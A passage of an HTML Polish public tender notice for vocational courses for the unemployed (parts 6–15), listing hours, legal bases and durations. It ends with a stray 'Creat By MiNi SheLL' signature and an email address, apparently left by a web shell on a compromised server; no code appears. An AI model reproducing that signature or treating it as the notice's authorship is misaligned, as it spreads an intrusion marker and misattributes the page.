w oparciu o program opracowany lub zatwierdzony przez jednostkę organizacyjną wyznaczoną przez Ministra właściwego do spraw gospodarki zgodnie z Rozporządzeniem Ministra Gospodarki z dnia 10 maja 2002r. w sprawie bezpieczeństwa i higieny pracy przy użytkowaniu wózków jezdniowych z napędem silnikowym (Dz. U. Nr 70, poz. 650 z późn. zm.) lub równoważny..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Operator koparko - ładowarki wszystkie typy klasa III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość osób: 10 w I edycji.
Czas realizacji: nie dłużej niż 7 tygodni. 
Program szkolenia: minimalna ilość godzin szkolenia - 202 godziny. Szkolenie powinno  być zorganizowane zgodnie z Rozporządzeniem Ministra Gospodarki z dnia 20 września 2001r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych                       i drogowych (Dz. U. Nr 118 poz. 1263), przeprowadzone w oparciu o program zatwierdzony przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie. 
Dodatkowe wymagania: Każdy uczestnik szkolenia powinien otrzymać świadectwo oraz uzyskać wpis                              do książki operatora wydane przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 49.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pracownik ochrony fizycznej I stopnia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość osób:  5 w I edycji.
Czas realizacji: nie dłużej niż 8 tygodni. 
Program szkolenia: Szkolenie ma przygotować uczestników do egzaminu na uzyskanie licencji pracownika ochrony fizycznej I stopnia oraz do pracy w zawodzie pracownika ochrony. Powinno być zgodne z przepisami ustawy z dnia 22 sierpnia 1997r. o ochronie osób i mienia (tekst jednolity: Dz. U. z 2005r. Nr 145 poz. 1221   z późn. zm.) oraz przeprowadzone w oparciu o program opracowany na podstawie Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 7 sierpnia 1998r. w sprawie rodzajów dyplomów i świadectw wydanych przez szkoły i inne placówki oświatowe, które potwierdzają uzyskanie specjalistycznych kwalifikacji w zakresie ochrony osób i mienia, minimalnego zakresu programów kursów pracowników ochrony fizycznej pierwszego i drugiego stopnia oraz zakresu obowiązujących tematów egzaminów i trybu ich składania, składu komisji egzaminacyjnej i sposobu przeprowadzania egzaminu (Dz. U. Nr 113 poz. 731)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 56.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Sprzedawca.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość osób:  10  w I edycji.
Czas realizacji: nie dłużej niż 8 tygodni. 
Program szkolenia: minimalna ilość godzin - 220, w tym minimum 120 godzin ćwiczeń.
1.modułowy program szkolenia zawodowego dla zawodu: sprzedawca, z zakresu: pracownik działu sprzedaży (kod zawodu: 522107) z następującymi jednostkami modułowymi: 
1)przestrzeganie zasad bezpieczeństwa i higieny pracy w jednostce handlowej - minimum 6 godzin,
2)organizacja handlu w gospodarce rynkowej - minimum 25 godzin,
3)wyposażenie punktu sprzedaży detalicznej - minimum 18 godzin,
4)organizacja zaopatrzenia i przyjmowanie dostaw towarów - minimum 25 godzin,
5)wykonywanie i dokumentowanie podstawowych obliczeń sklepowych - minimum 50 godzin,
6)obsługiwanie klienta, przebieg sprzedaży detalicznej- minimum 32 godziny.
Uwaga: Każda jednostka modułowa musi zawierać wszystkie jednostki szkoleniowe zgodnie z modułowym programem szkolenia dostępnym na stronie www.standardyiszkolenia.praca.gov.pl. 
2. jednostkę modułową: obsługa kasy fiskalnej - minimum  10 godzin,
3. jednostkę modułową: fakturowanie komputerowe- minimum 14 godzin,
4. jednostkę modułową: podstawowe zasady higieny- minimum 10 godzin,
5. jednostkę modułową: obsługa programu SUBIEKT dla WINDOWS do prowadzenia gospodarki magazynowej- 
    minimum 30 godzin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 56.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Prawo jazdy kat. C lub kat. E.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość osób:  10 (zamawiający będzie kierował osoby bezrobotne na szkolenie indywidualnie lub grupowo  w zależności od ilości osób zakwalifikowanych na szkolenie).
Czas realizacji: nie dłużej niż 8 tygodni. 
Program szkolenia:  Programy szkolenia winny być zgodne z obowiązującymi przepisami prawa tj. Ustawą   z dnia 20 czerwca 1997r. - Prawo o ruchu drogowym (tekst jednolity: Dz. U. z 2005r. Nr 108 poz. 908 z późn. zm.) oraz  Rozporządzeniem  Ministra Infrastruktury z dnia 27 października 2005r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami,  instruktorów i egzaminatorów                            (Dz. U. Nr 217 poz. 1834 z późn. zm.).               
Osoba skierowana na szkolenie może uzyskać jeden rodzaj prawa jazdy.
Dodatkowe wymagania: Każdy uczestnik szkolenia powinien otrzymać zaświadczenie potwierdzające ukończenie szkolenia zgodnie z wzorem stanowiącym załącznik Nr 4 do powyższego Rozporządzenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 56.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Uprawnienia elektryczne do 1 kV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość osób: 5 osób w I edycji 
Czas realizacji: nie dłużej niż 2 tygodnie. 
Program szkolenia: Program szkolenia musi być zgodny z przepisami rozporządzenia Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz. U. Nr 89, poz. 828                    z późn. zm.) i obwieszczenia Prezesa Rady Ministrów z dnia 02 lipca 2003r. o sprostowaniu błędów                             (Dz. U. Nr 129, poz. 1184) oraz rozporządzenia Ministra Gospodarki i Pracy z dnia 20 lipca 2005r. zmieniającego rozporządzenie w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń instalacji i sieci ( Dz. U. Nr 141, poz. 1189) oraz zawierać m.in.:
1.zasady budowy, działania oraz warunków technicznych obsługi urządzeń, instalacji i sieci,
2.zasady eksploatacji oraz instrukcji eksploatacji urządzeń, instalacji i sieci,zasady i warunki wykonywania prac kontrolno - pomiarowych i montażowych,
3.zasady i wymagania bezpieczeństwa pracy i ochrony przeciwpożarowej oraz umiejętności udzielania pierwszej pomocy,
4.instrukcję postępowania w razie awarii, pożaru lub innego zagrożenia bezpieczeństwa obsługi urządzeń lub zagrożenia życia, zdrowia i środowiska.
Szkolenie powinno zakończyć się egzaminem zewnętrznym przed Komisją powołaną przez Urząd Regulacji Energetyki.
Dodatkowe wymagania: Każdy uczestnik szkolenia powinien otrzymać świadectwo kwalifikacyjne                        w grupie materiałowej G-1E zgodnie z wzorem świadectwa kwalifikacyjnego stanowiącym załącznik                                    do rozporządzenia Ministra Gospodarki i Pracy z dnia 20 lipca 2005r.  zmieniającego rozporządzenie w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń instalacji i sieci (Dz. U. Nr 141 poz. 1189)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Szkolenie kierowców wykonujących przewóz drogowy - szkolenie w ramach kwalifikacji wstępnej w zakresie prawa jazdy kat. C lub kat. D.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość osób:  5 w I edycji 
Czas realizacji: nie dłużej niż 10 tygodni. 
Program szkolenia: Programy szkolenia winny być zgodne z obowiązującymi przepisami prawa tj. Ustawą   z dnia 06 września 2001r. - o transporcie drogowym (tekst jednolity: Dz. U. z 2007r. Nr 125 poz. 874 z późn. zm.) oraz Rozporządzeniem Ministra Infrastruktury z dnia 2 lipca 2008r. w sprawie szkolenia kierowców wykonujących przewóz drogowy (Dz. U. Nr 124, poz. 805). 
Osoba skierowana na szkolenie może uzyskać jeden rodzaj kwalifikacji.
Dodatkowe wymagania: Każdy uczestnik szkolenia powinien otrzymać zaświadczenie potwierdzające ukończenie szkolenia zgodnie z wzorem stanowiącym załącznik Nr 3 do powyższego Rozporządzenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 70.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Księgowość z zastosowaniem komputera.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość osób:  10 w I edycji.
Czas realizacji: nie dłużej niż 9 tygodni. 
Program szkolenia: minimalna ilość godzin - 270, w tym minimum 220 godzin ćwiczeń.
Program szkolenia musi zawierać:
1.modułowy program szkolenia zawodowego dla zawodu: księgowy (samodzielny), z zakresu:  księgowy bilansista (kod zawodu: 343201) z następującymi jednostkami modułowymi: 
1)ogólne zasady rachunkowości,
2)środki gospodarcze i źródła ich pochodzenia,
3)ewidencja operacji gospodarczych,
4)organizacja rachunkowości w jednostkach gospodarczych,
5)ogólne zasady inwentaryzacji,
6)ewidencja obrotu gotówkowego,
7)ewidencja obrotu bezgotówkowego,
8)ewidencja innych środków pieniężnych,
9)sporządzanie list płac i rozdzielników,
10)sporządzanie list zasiłków i deklaracji ZUS
11)rozliczanie podatku dochodowego od osób fizycznych,
12)ewidencja rozrachunków z tytułu VAT,
13)ewidencja rozrachunków z dostawcami,
14)ewidencja rozrachunków z odbiorcami,
15)ewidencja rozrachunków z pracownikami,
16)ewidencja rozrachunków publiczno - prawnych,
17)ewidencja pozostałych rozrachunków,
18)ewidencja roszczeń,
19)ewidencja roszczeń barterowych,
20)ewidencja inwestycji,
21)ewidencja środków trwałych,
22)ewidencja finansowego majątku trwałego,
23)ewidencja wartości niematerialnych i prawnych,
24)ewidencja leasingu,
25)ewidencja i rozliczanie zakupu towarów i opakowań,
26)ewidencja zakupu usług,
27)ewidencja i rozliczanie zakupu materiałów,
28)ewidencja zużycia materiałów,
29)rozliczenie kosztów handlowych,
30)ewidencja i rozliczenie kosztów przedsiębiorstwa,
31)kalkulacja kosztu jednostkowego produktu,
32)ewidencja wyrobów gotowych,
33)ewidencja sprzedaży towarów,
34)ewidencja sprzedaży usług,
35)ewidencja sprzedaży wyrobów gotowych,
36)ustalenie wyniku finansowego,
37)ewidencja wyniku finansowego,
38)podział wyniku finansowego,
39)ewidencja funduszy i kapitałów własnych,
40)ewidencja funduszy specjalnych,
41)sporządzanie sprawozdań,
42)sporządzanie bilansu,
43)sporządzanie sprawozdań z przepływu środków pieniężnych,
44)sporządzanie rachunku zysków i strat,
45)analiza podstawowych wskaźników finansowych,
46)obsługa komputera w zakresie podstawowym,
47)arkusze kalkulacyjne w zastosowaniach  finansowo- księgowych,
48)obsługa programów płacowych,
49)obsługa programów finansowo- księgowych
-- suma godzin dla jednostek modułowych 46,47,48,49 - minimum 50 godzin
Uwaga: Każda jednostka modułowa musi zawierać wszystkie jednostki szkoleniowe zgodnie                                 z modułowym programem szkolenia dostępnym na stronie www.standardyiszkolenia.praca.gov.pl.
2.jednostkę modułową: lektorat języka angielskiego (słownictwo związane z tematem szkolenia)-    minimum 20 godzin.
Dodatkowe wymagania: Wykonawca zakupi dla każdego uczestnika szkolenia książkę, której tematyka zgodna będzie z zakresem szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 63.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Kucharz małej gastronomii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość osób:  10 w I edycji.
Czas realizacji: nie dłużej niż 7 tygodni. 
Program szkolenia: minimalna ilość godzin - 210, w tym minimum 170 godzin ćwiczeń, przy czym co najmniej 50% ćwiczeń powinno odbyć się na stanowisku pracy ( w jednostce żywienia zbiorowego). 
Program szkolenia musi zawierać:
1. modułowy program szkolenia zawodowego dla zawodu: kucharz, z zakresu: wykonywanie zadań w kuchni pod nadzorem kucharza (kod zawodu: 512201) z następującymi jednostkami modułowymi: 
1)przestrzeganie przepisów bhp i ppoż. oraz wymogów higieniczno - sanitarnych- minimum 10 godzin,
2)przygotowanie stanowiska pracy zgodnie z wymogami- minimum 5 godzin,
3)czynności porządkowe w kuchni- minimum  5 godzin,
4)przechowywanie surowców i przygotowanie do obróbki wstępnej- minimum 10 godzin,
5)obróbka wstępna jaj - minimum 5 godzin,
6)obróbka wstępna ryb- minimum 5 godzin,
7)obróbka wstępna jarzyn- minimum 5 godzin, 
8)obróbka wstępna drobiu i dzikiego ptactwa- minimum 5 godzin,
9)obróbka wstępna mięsa zwierząt rzeźnych i dziczyzny- minimum 15 godzin,
10)obróbka wstępna podrobów- minimum 5 godzin,
11)przygotowanie surówek- minimum 5 godzin,
12)obróbka termiczna produktów- minimum 5 godzin,
13)przygotowanie sałatek- minimum 10 godzin,
14)przygotowanie potraw mlecznych- minimum 10 godzin,
15)obróbka termiczna jarzyn- minimum 15 godzin,
16)przygotowanie potraw z kaszy- minimum 10 godzin,
17)przygotowanie potraw z mąki- minimum 15 godzin,
18)przygotowanie potraw z jaj - minimum 10 godzin,
19)sporządzanie zup i dodatków do zup- minimum 10 godzin.
Uwaga: Każda jednostka modułowa musi zawierać wszystkie jednostki szkoleniowe zgodnie  z modułowym programem szkolenia dostępnym na stronie www.standardyiszkolenia.praca.gov.pl. 
2.jednostkę modułową: obsługa kasy fiskalnej - minimum  10 godzin,
3.jednostkę modułową: lektorat języka angielskiego (słownictwo związane z tematem szkolenia) - minimum 20 godzin,
4.jednostkę modułową: podstawowe zasady higieny- minimum 10 godzin,
5.jednostkę modułową: sporządzanie kalkulacji i ustalanie cennika potraw- minimum 10 godzin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 49.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Kurs ogólnobudowlany.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość osób: 10 osób w I edycji 
Czas realizacji: nie dłużej niż 10 tygodni. 
Program szkolenia:  minimalna ilość godzin  - 300, w tym minimum 250 godzin zajęć praktycznych na stanowisku pracy lub w innym miejscu umożliwiającym nabycie przez kursantów umiejętności praktycznych.
Program szkolenia musi zawierać:
1.modułowy program szkolenia zawodowego dla zawodu: betoniarz zbrojarz, z zakresu: wykonywanie robót betoniarskich i zbrojarskich w budownictwie (kod  zawodu: 712202) z następującymi jednostkami modułowymi: 
1)przygotowanie robót betoniarskich i zbrojarskich na podstawie dokumentacji technicznej,
2)przestrzeganie przepisów bezpieczeństwa i higieny pracy, ochrony przeciwpożarowej i ochrony środowiska oraz udzielania pomocy przedlekarskiej,
3)przygotowanie mieszanki betonowej,
4)przygotowanie zbrojenia,
5)zbrojenie i betonowanie fundamentów, 
6)zbrojenie i betonowanie elementów ściennych,
2.modułowy program szkolenia zawodowego dla zawodu: dekarz, z zakresu: roboty dekarskie (kod zawodu: 713101) z następującymi jednostkami modułowymi: 
1)krycie dachów papą,
2)stosowanie bezpiecznych metod pracy,
3)krycie dachów dachówkami,
3.modułowy program szkolenia zawodowego dla zawodu: brukarz/kamieniarz, z zakresu: roboty brukarskie (kod : 711301) z następującymi jednostkami modułowymi: 
1)wykonywanie robót ziemnych i podsypek,
2)brukowanie nawierzchni z różnych materiałów,
4.modułowy program szkolenia zawodowego dla zawodu: murarz/tynkarz, z zakresu: wykonywanie murowania różnych elementów budynków  (kod : 713302) z następującymi jednostkami modułowymi: 
1)rysunek techniczny dla murarzy,
2)materiały budowlane do robót murarskich,
3)przygotowanie zapraw murarskich,
4)rusztowania do robót murarskich,
5)bhp przy robotach murarskich,
6)wykonywanie murów nośnych z różnych materiałów i o różnych grubościach,
7)wykonywanie murów mieszanych z różnych materiałów,
8)wykonywanie ścian działowych z różnych materiałów,

5.modułowy program szkolenia zawodowego dla zawodu: tynkarz, z zakresu: roboty tynkarskie wewnętrzne i zewnętrzne (kod zawodu: 713302) z następującymi jednostkami modułowymi:
1)czytanie dokumentacji,
2)materiały, narzędzia, sprzęt i urządzenia,
3)składowanie, magazynowanie materiałów i ochrona środowiska,
4)przygotowanie zapraw sposobem ręcznym i mechanicznym,
5)stosowanie bezpiecznych metod pracy,
6)wykonywanie rusztowań do tynków wewnętrznych,
7)wyznaczanie lica tynku,
8)przygotowanie podłoży pod tynk,
9)wykonanie tynku jednowarstwowego,
10)wykonanie tynku dwuwarstwowego,
11)wykonanie tynku trójwarstwowego  zwykłego,
12)wykonanie tynków zewnętrznych ozdobnych,
13)wykonanie tynków suchych z płyt gipsowo- kartonowych,
14)wykonanie tynku sposobem mechanicznym,
15)wykonanie tynków wodoszczelnych,
6.modułowy program szkolenia zawodowego dla zawodu: monter izolacji budowlanych, z zakresu: roboty izolacyjne (kod zawodu: 713401) z następującymi jednostkami modułowymi: 
1)izolacje wodochronne,
2)izolacje termiczne i akustyczne.
Uwaga: Każda jednostka modułowa musi zawierać wszystkie jednostki szkoleniowe zgodnie                                      z modułowym programem szkolenia dostępnym na stronie www.standardyiszkolenia.praca.gov.pl..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 70.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Profesjonalna opiekunka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość osób:  10 w I edycji.
Czas realizacji: nie dłużej niż 7 tygodni. 
Program szkolenia: minimalna ilość godzin - 210, w tym minimum 100 godzin zajęć praktycznych na stanowisku pracy (w jednostkach zajmujących się opieką nad dziećmi, osobami starszymi   lub niepełnosprawnymi).
Program szkolenia musi zawierać:
1. modułowy program szkolenia zawodowego dla zawodu: opiekunka dziecięca, z zakresu: udział   w procesie wychowawczym małego dziecka (kod zawodu: 513102) z następującymi jednostkami modułowymi: 
1)obserwowanie dziecka i nawiązywanie z nim kontaktów - minimum 20 godzin,
2)planowanie, organizowanie i prowadzenie pracy z dzieckiem - minimum 35 godzin,
3)wykonywanie podstawowych czynności z zakresu higieny i pielęgnacji małego dziecka - minimum  35 godzin,
2. modułowy program szkolenia zawodowego dla zawodu: opiekunka domowa, z zakresu: opieka domowa   nad osobą starszą i niepełnosprawną  (kod zawodu: 513301) z następującymi jednostkami modułowymi: 
1)wykonywanie codziennych czynności z zakresu gospodarstwa domowego - minimum 20 godzin,
2)wykonywanie czynności higienicznych przy podopiecznym - minimum 30 godzin,
3)wspieranie biologicznych funkcji życiowych podopiecznego - minimum 35 godzin,
4)organizowanie czasu podopiecznemu i dotrzymywanie towarzystwa - minimum 35 godzin,
Uwaga: Każda jednostka modułowa musi zawierać wszystkie jednostki szkoleniowe zgodnie z modułowym programem szkolenia dostępnym na stronie www.standardyiszkolenia.praca.gov.pl..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 49.</p></li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com